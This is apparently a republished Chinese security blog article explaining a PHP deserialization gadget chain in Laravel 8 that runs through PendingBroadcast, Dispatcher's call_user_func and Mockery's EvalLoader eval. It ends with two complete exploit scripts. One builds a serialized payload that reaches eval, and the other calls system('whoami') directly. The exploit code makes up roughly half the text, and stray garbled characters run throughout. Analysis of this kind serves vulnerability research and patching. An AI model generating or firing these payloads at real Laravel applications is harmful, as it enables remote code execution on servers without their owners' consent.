Laravel 8中怎么實(shí)現反序列化
發(fā)布時(shí)間:2021-08-23 15:12
來(lái)源:億速云
閱讀:0
作者:Leah
欄目: 網(wǎng)絡(luò )安全
本篇文章為大家展示了Laravel 8中怎么實(shí)現反序列化�,內容簡(jiǎn)明扼要并且容易理解�,絕對能使你眼前一亮�����,通過(guò)這篇文章的詳細介紹希望你能有所收獲����。
text
首先還是老樣子��,熟悉laravel的pop鏈的師傅肯定比較熟悉��,入口點(diǎn)還是PendingBroadcast.php中的析構函數����;
public function __destruct()
{
$this->events->dispatch($this->event);
}這里很明顯可以控制任意類(lèi)下的dispatch函數�����;這里還是選擇Dispatcher.php進(jìn)行續鏈��;
public function dispatch($command)
{
return $this->queueResolver && $this->commandShouldBeQueued($command)
? $this->dispatchToQueue($command)
: $this->dispatchNow($command);
}這里簡(jiǎn)單的看下源碼�,感興趣的師傅可以拿著(zhù)laravel5的源碼來(lái)進(jìn)行對比�,這里只不過(guò)是寫(xiě)成了三元運算的形式��,本質(zhì)上還是一樣的�����,我們控制queueResolver變量和commandShouldBeQueued函數�����,使其返回為真���,這樣就可進(jìn)入dispatchToQueue函數��;這里審計下類(lèi)不難發(fā)現queueResolver是我們可控的變量�,然而commandShouldBeQueued函數我們可以追溯一下�����;
protected function commandShouldBeQueued($command)
{
return $command instanceof ShouldQueue;
}這里不難發(fā)現�,是需要我們的command是繼承ShouldQueue接口的類(lèi)就可��;所以全局搜索���;選擇BroadcastEvent.php的類(lèi)�;然后便可返回true��,然后進(jìn)入dispatchToQueue函數����;回溯一下dispatchToQueue函數���;
public function dispatchToQueue($command)
{
$connection = $command->connection ?? null;
$queue = call_user_func($this->queueResolver, $connection);可以發(fā)現這里有個(gè)危險函數call_user_func����;可以直接實(shí)現任意類(lèi)下的任意方法���;這里就可直接跳轉到我們想要執行的方法下�����;全局搜索一下eval方法�����;發(fā)現存在�����;
class EvalLoader implements Loader
{
public function load(MockDefinition $definition)
{
if (class_exists($definition->getClassName(), false)) {
return;
}
eval("?>" . $definition->getCode());
}
}call_user_func函數在第一個(gè)參數為數組的時(shí)候�,第一個(gè)參數就是我們選擇的類(lèi)����,第二個(gè)參數是類(lèi)下的方法����;所以這里直接去到EvalLoader類(lèi)�����,去執行load方法從而調用到eval函數�����;這里發(fā)現存在參數���,而且參數必須是MockDefinition類(lèi)的實(shí)例����;也即是意味著(zhù)我們connection需要為MockDefinition類(lèi)的實(shí)例���;
繼續審計發(fā)現�,必須if為false才會(huì )觸發(fā)eval方法�;所以這里我們需要直接追溯到MockDefinition類(lèi)中���;
class MockDefinition
{
protected $config;
protected $code;
public function __construct(MockConfiguration $config, $code)
{
if (!$config->getName()) {
throw new \InvalidArgumentException("MockConfiguration must contain a name");
}
$this->config = $config;
$this->code = $code;
}
public function getConfig()
{
return $this->config;
}
public function getClassName()
{
return $this->config->getName();
}
public function getCode()
{
return $this->code;
}
}看下getClassName函數�����;這里的config是可控的��,所以我們直接找到一個(gè)存在getName方法并且可控該方法的類(lèi)�����;全局搜索下找到MockConfiguration.php可以實(shí)現��;
protected $name;
public function getName()
{
return $this->name;
}因為最后是要經(jīng)過(guò)class_exit函數的判斷的�,所以我們可以直接控制其返回一個(gè)不存在的類(lèi)��,就會(huì )造成false從而進(jìn)入eval方法��;繼續回到eval方法��;
class EvalLoader implements Loader
{
public function load(MockDefinition $definition)
{
if (class_exists($definition->getClassName(), false)) {
return;
}
eval("?>" . $definition->getCode());
}
}這里還有個(gè)getCode方法����,我們通過(guò)上面的類(lèi)也可審計getCode方法����;code在MockDefinition類(lèi)中也是可控的�,所以我們可以隨意的控制其內容����,那么我們就可命令執行�;放出我exp:
<?php
namespace Illuminate\Broadcasting{
use Illuminate\Contracts\Events\Dispatcher;
class PendingBroadcast
{
protected $event;
protected $events;
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace Mockery\Loader{
use Mockery\Generator\MockDefinition;
class EvalLoader
{
public function load(MockDefinition $definition)
{}
}
}
namespace Mockery\Generator{
class MockConfiguration
{
protected $name;
public function __construct($name){
$this->name = $name;
}
}
}
namespace Mockery\Generator{
class MockDefinition
{
protected $config;
protected $code;
public function __construct($config,$code)
{
$this->config = $config;
$this->code = $code;
}
}
}
namespace{
$e = new Mockery\Generator\MockConfiguration('s1mple');
$d = new Mockery\Loader\EvalLoader();
$f = new Mockery\Generator\MockDefinition($e,'<?php phpinfo();?>');
$c = new Illuminate\Broadcasting\BroadcastEvent($f);
$a = new Illuminate\Bus\Dispatcher(array($d,"load"));
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo urlencode(serialize($b));
}這里為了節省時(shí)間��,我最后用abcdef直接代替了�����,造成rce�;
細心的師傅想必也發(fā)現了��;在最開(kāi)始的call_user_func處�,也是可以進(jìn)行命令執行的�����;
public function dispatchToQueue($command)
{
$connection = $command->connection ?? null;
$queue = call_user_func($this->queueResolver, $connection);這里可以直接控制進(jìn)行命令執行��;這個(gè)很簡(jiǎn)單�,就直接放出我exp吧����;
<?php
namespace Illuminate\Broadcasting{
use Illuminate\Contracts\Events\Dispatcher;
class PendingBroadcast
{
protected $event;
protected $events;
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace{
$c = new Illuminate\Broadcasting\BroadcastEvent('whoami');
$a = new Illuminate\Bus\Dispatcher('system');
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo urlencode(serialize($b));
}
